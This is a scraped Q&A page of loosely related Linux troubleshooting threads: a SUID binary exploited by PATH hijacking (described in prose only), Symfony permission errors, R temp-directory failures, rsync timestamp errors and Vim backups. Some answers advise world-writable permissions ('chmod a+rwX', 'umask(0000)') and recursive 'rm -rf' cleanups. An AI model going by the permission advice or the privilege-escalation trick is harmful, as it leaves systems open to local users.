I am working on a SUID root binary 'app' that runs a system("ls -la /dir") command and managed to exploit it by writing a malicious ls to get root and changing my user's environment path to set it to higher priority than the kernel's one.
I noticed that executing it as user returns me root shell while executing it with sudo "./example" uses root's path and simply lists the files in dir. As far as i know setuid inherits owner's (in this case root) privileges to user and sudo executes as root.
What are such vulnerabilities called ? How would an app developer patch it? I there any way i can force user's to use sudo ./app to execute a program?
I recommend you change app to use an absolute path for the commands it runs. For example:
system("/bin/ls -la /dir");
Even if the users use the sudo command to execute it, there are sudo arguments they can use (--preserve-env) to preserve their own PATH.
If you want the users to run app using sudo, then there's no need for the binary to be SUID root.
Related
Before i executed an update (composer.phare update) with the root user, every thing works fine, but now when i tries to run "Assetic:dump -env-prod" i get a "Permission denied" error
[Assetic\Exception\FilterException]
An error occurred while running:
'' '-jar' '/home/symfony/www/app/Resources/java/yuicompressor.jar' '--ch
arset' 'UTF-8' '-o' '/tmp/YUI-OUT-vbRlyu' '--type' 'css' '/tmp/YUI-IN-OoRVH
Q'
Error Output:
sh: 1: : Permission denied
Input:
meta.foundation-version{ ...
I tried all the solutions in this post Fontawesome fonts fail after assets:install and assetic:dump
clear the cache, chown, chgrp and chmod nothing worked always the same problem
One way to deal with file permissions when you are running a web based application which requires either auto deployment or constant manual updates like using bin/console from symfony2, its to make sure that the files belongs to the user under which your application runs.
As you did not provide environment settings, I will be making a few assumptions and provide you with a generic setup scenario, hopefully this will help guide you to the the best solution for your specific case.
Environment Assumptions:
OS: linux flavor;
Web server: nginx will be running as www-data;
PHP: php-fpm will running as testapp and using a socket connection for this application;
Generic set-up steps:
In the /etc/nginx/nginx.conf file, make sure that the user/group are set to www-data;
In the /etc/php5/fpm/pool.d/apptest.conf file, make sure that the user & group are set to testapp;
TIP: The file above might need to be created, if that's the case you should just copy the content of the www.conf file located in the same folder.
In the /etc/php5/fpm/pool.d/apptest.conf file, make sure listen.owner & listen.group are set to www-data;
Make sure that you have a line like the one below in this file /etc/php5/fpm/pool.d/apptest.conf:
listen = /var/run/php5-fpm.apptest.sock.
NOTE: the fpm.apptest.sock portion of that line above, its the name of a file that does not exist yet but will be created when you restart php. The benefit is that you will have an isolated php process for this application;
a) In the case on nginx and if you are using socket connections, make sure to add this line in your apptest conf file:
unix:/var/run/php5-fpm.apptest.sock;
b) If you are using apache add this line in that conf file:
-socket /var/run/php5-fpm.apptest.sock;
If you are on a linux box, create user with no password and it should be called, apptest.
Note: apptest is the name of your application, it will also be the user under which php will be running and it should also be the application files/folders owner.
Restart php and nginx/apache.
Tip: to change to a user in linux which has no password, you should have root privileges and run:
sudo -u apptest -i.
After this, you should perform all your commands as the apptest user previously created, including running the symfony2 bin/console.
These are very generic steps, so if you need any clarification, let me know.
I do not recommend to use root for updating. In my opinion the way to go is to have /app/logs /app/cache writable for the server and the src and vendor folder only readable for the server.
So lets say your user and group is: coolman, than try this:
# everything is yours
chown coolman:coolman -R .
# all and group can access folders and read files, you as user can additionally write them
chmod ag=rX,u=rwX -R .
# full access to logs and cache for everyone (also the server)
chmod a+rwX -R app/logs app/cache
You make your composer update with your coolman user.
There is only one small problem, too. The logs might be www-data:www-data rw-r--r-- so you cannot delete them. So just add a line to your app.php and your app/console file:
\umask(0000);
I think this line is commented out as default. This says, that if no explicit rights are set within PHP, than every file which is created will get 0777 - mask = 0777 so you can delete logs and cache then.
I would like to create a cron that remove a file every 24hrs but it doesn't work for me !
emptyCache.php permission 755
rm -rf app/cache/*
I use for that a cron from OVH to do the job, I follow the process but the folder wasn't removed! My question is: is it the right command?
Here is an example of script which should work on a OVH hosting (Pro 2014), you don't need to use any PHP or Symfony2 file or command:
File: /homez.807/[my_login]/symfony2/launch_commands.php
#!/bin/bash
rm -rf /homez.807/[my_login]/symfony2/app/cache/*
It's simpler to put the full path of the directory you want to erase, but you can also use the cd command to change the directory then delete the sub-directory.
And here is the configuration in the OVH manager (see the Cron tab):
So the ./ is the root of you web hosting, corresponding to /homez.807/[my_login]/. Here are the two important options :
Script: we have to put the relative path (from the root of the web hosting) of the script: symfony2/launch_commands.sh
Language: Other because the script should be executed by the shell, not the PHP interpreter
Logs: you should enable logs in order to send the result of the cron task by email
Description: choose an explicit name
When attempting to run R, I get this error:
Fatal error: cannot mkdir R_TempDir
I found two possible fixes for this problem by googling around. The first was to ensure my tmp directory didn't contain a load of subdirectories - it doesn't and it's virtually empty. The second fix was to ensure that TMP, TMPDIR, and R_USER in my environment weren't set to non-existent paths - I didn't even have these set. Therefore, I created a tmp directory in my home directory and added it's path to TMP in my environment. I was able to run R once and then I got the fatal error again. Nothing was in the TMP directory that I set in my environment. Does anyone know what else I can try? Thanks.
Dirk is right, but misses a point: If /tmp is full, you can't create subdirectories there. Try
df /tmp
I just hit this on a shared server, where /tmp is mounted on it's own partition, and is shared by many users. In this particular case, you can't really see who's fault it is, because permissions restrict you seeing who is filling up the tmp partition. Basically have to ask the sys admins to figure it out.
Your default temporary directory appears to have the wrong permissions. Here I have
$ ls -ld /tmp
drwxrwxrwt 22 root root 4096 2011-06-10 09:17 /tmp
The key part is 'everybody' can read or write. You need that too. It certainly can contain subdirectories.
Are you running something like AppArmor or SE Linux?
Edit 2011-07-21: As someone just deemed it necessary to downvote this answer -- help(tempfile) is very clear on what values tmpdir (the default directory for temporary files or directories) tries:
By default, 'tmpdir' will be the directory given by 'tempdir()'. This
will be a subdirectory of the temporary directory found by the
following rule. The environment variables 'TMPDIR', 'TMP' and 'TEMP'
are checked in turn and the first found which points to a writable
directory is used: if none succeeds '/tmp' is used.
So my money is on checking those three environment variables. But AppArmor and SELinux have shown to be an issue too on some distributions.
Go to your user directory and create a file called .Renviron and add the following line, save it and reopen RStudio or Rgui or Rterm
TMP = '<path to folder where Everyone has full control>'
This worked with me on Windows 7
If you are running one of the rocker docker images (e.g., rocker/verse), you need to map a local directory to the /tmp directory in the container. For example,
docker run --rm -v ${PWD}/tmp:/tmp -p 8787:8787 -e PASSWORD=password rocker/verse:4.0.4
where ${PWD} for me is ~/devProjs/r, and I created a /tmp directory inside it, so that the container's /tmp is mapped to my ~/devProjs/r/tmp directory.
Just had this issue and finally solved it. Simply a windows permission issue. Go to environment variables and find the location of the temp folders. Then right click on the folder > properties > security > advanced > change everyone to full control > tick "replace all child object permission entries with inheritable permission entries from this object" > Ok > ok.
This will also happen when your computer is completely, utterly out of space. Currently, my Mac has 0 kb free and it's causing this error. Freeing up some space solved the problem.
Check for the user account with which you are launching the RStudio with. Now u check the TMP(System Environment variable) for its location. If the user who is launching RStudio has Write access for those directories you will not face this issue. Being said that you are facing this issue, all you have to do is to change the permissions for that user to have write access on those directories.
Running R on CentOS system and had the same issue. I had to remove all R folders from the tmp directory. Usually all R folders will be in the form of /tmp/Rtmp*****
so i tried to delete the folders from /tmp by running the below.
CD into /tmp directory and run rm -rf Rtmp*
R shell Worked for me afterwards
I had this issue, solution was slightly different. I run R on a linux server - it turned out for me R had made a whole load of tempdirs when running jobs with cron that had hung and not been cleaned up, clogging up the root /tmp directory with ~300 RtmpXXXXXX folders.
Using terminal access, I navigated to the /tmp folder did a recursive find/rm - deleting all of them using this command:
find . -type d -name 'Rtmp*' -exec rm -r -v {} \;
After this, Rstudio took a while to load up, but was once again happy and my scripts began to run again.
You will need the appropriate admin rights for this solution. And always be careful when running rm -r, especially with a find command, as it's easy to remove things unexpectedly.
When it comes to deleting tmp files, make sure that the tmp files are in the server or in local.
If its in the remote, 1st check for the df /tmp in the server or in the remote to see who uses more storage.
Then use rm(file_name)` to remove the files which cause the blocking.
If its in the remote, then use rm /tmp/(file_name)..
MOreover, you can also refer to https://support.rstudio.com/hc/en-us/articles/218730228-Resetting-a-user-s-state-on-RStudio-Server
I'm getting a confusing error from rsync and the initial things I'm finding from web searches (as well as all the usual chmod'ing) are not solving it:
rsync: failed to set times on "/foo/bar": Operation not permitted (1)
rsync error: some files could not be transferred (code 23)
at /SourceCache/rsync/rsync-35.2/rsync/main.c(992) [sender=2.6.9]
It seems to be working despite that error, but it would be nice to get rid of that.
If /foo/bar is on NFS (or possibly some FUSE filesystem), that might be the problem.
Either way, adding -O / --omit-dir-times to your command line will avoid it trying to set modification times on directories.
The issue is probably due to /foo/bar not being owned by the writing process on a remote darwin (OS X) system.
A solution to the issue is to set adequate owner on the remote site.
Since this answer has been voted, and therefore has been hopefully useful to someone, I'm extending it to make it clearer.
The reason why this happens is that rsync is probably trying to set an arbitrary modification time (mtime) when copying files.
In order to do this darwin's system utime() function requires that the writing process effective uid is either the same as the file uid or super user's one, see opengroup utime's page.
Check this discussion on rsync mailing list as reference.
As #racl101 has commented on an answer, this problem might be related to the folder owner. The rsync command should be done by the same user as the folder owner's one. If it's not the same, you can change it.
chown -R userCorrect /remote/path/to/foo/bar
I had the same problem. For me the solution is to delete the remote file and let rsync create again.
The problem in my case was that the "receiver mountpoint" was incorrectly mounted. It was in read-only mode (for some extrange reason).
It looked like rsync was copying the files, but it was not.
I checked my fstab file and changed mount options to default, re-mount file system and execute rsync again. All fine then.
I've seen that problem when I'm writing to a filesystem which doesn't (properly) handle times -- I think SMB shares or FAT or something.
What is your target filesystem?
This happened to me on a partition of type xfs (rw,relatime,seclabel,attr2,inode64,noquota), where the directories where owned by another user in a group we were both members of. The group membership was already established before login, and the whole directory structure was group-writeable. I had manually run sudo chown -R otheruser.group directory and sudo chmod -R g+rw directory to confirm this.
I still have no idea why it didn't work originally, but taking ownership with sudo chown -R myuser.group directory fixed it. Perhaps SELinux-related?
I came across this problem as well and the issue I was having was a permissions issue with the root folder that contained the files I was trying to send over. I don't care about that root folder being included with rsync I just care what's in it. The error was coming from my command where I need to specify an additional / at the end. If you do not have that trailing slash rsync will attempt to set times the folder.
Example:
This will attempt to set times on html
rsync /var/www/html/ ubuntu#xxx.xxx.xxx.xxx:html
This will not
rsync /var/www/html/ ubuntu#xxx.xxx.xxx.xxx:html/
This error might also pop-up if you run the rsync process for files that are not recently modified in the source or destination...because it cant set the time for the recently modified files.
I ran into this error trying to fix timestamps on a new MacOS Monterey, after the Migration Assistant decided to set all of them to the time the copy operation occurred, instead of the original file's.
anddam's answer did not help me, as the remote user used in the rsync command did match the directories and files owner.
After further research, I realised that I had no access to the Mac's Documents directory over SSH (error ls: Documents: Operation not permitted).
I managed to fix the problem by opening System Preferences on the Mac, then selecting Security & Privacy, go to Privacy tab select Full Disk Access and check the box next to sshd-keygen-wrapper.
It could be that you don't have privileges to some of the files. From an administrator account, try "sudo rsync -av " Alternately, enable the root account and sign in as root. That should allow you to completely hose your system and brute force your rsync! ;-) I'm not sure if the above mentioned --extended-attributes will help, but I threw it in too, just for good measure.
Problem 1: my Vim makes backups with the extension ~ to my root
I have the following line in my .vimrc
set backup backupdir=~/tmp/vim//,~/tmp//,.//,/var/tmp//,/tmp//$
However, I cannot see a root directory in the line.
Why does my Vim make backups of my shell scripts with the extension ~ to my root?
Problem 2: my Zsh run my shell scripts at login which I have in my PATH. For instance, my "replaceUp" shell-script started at my root at login. I keep it at ~/bin/shells/apps by default.
Why does Zsh run shell scripts which are in my PATH at login?
The files ending with ~ are swap files used by vim while editing files. You can try setting the backupdir and directory variables
set backupdir=~/tmp/vim//,~/tmp//,.//,/var/tmp//,/tmp//
set directory=~/tmp/vim//,~/tmp//,.//,/var/tmp//,/tmp//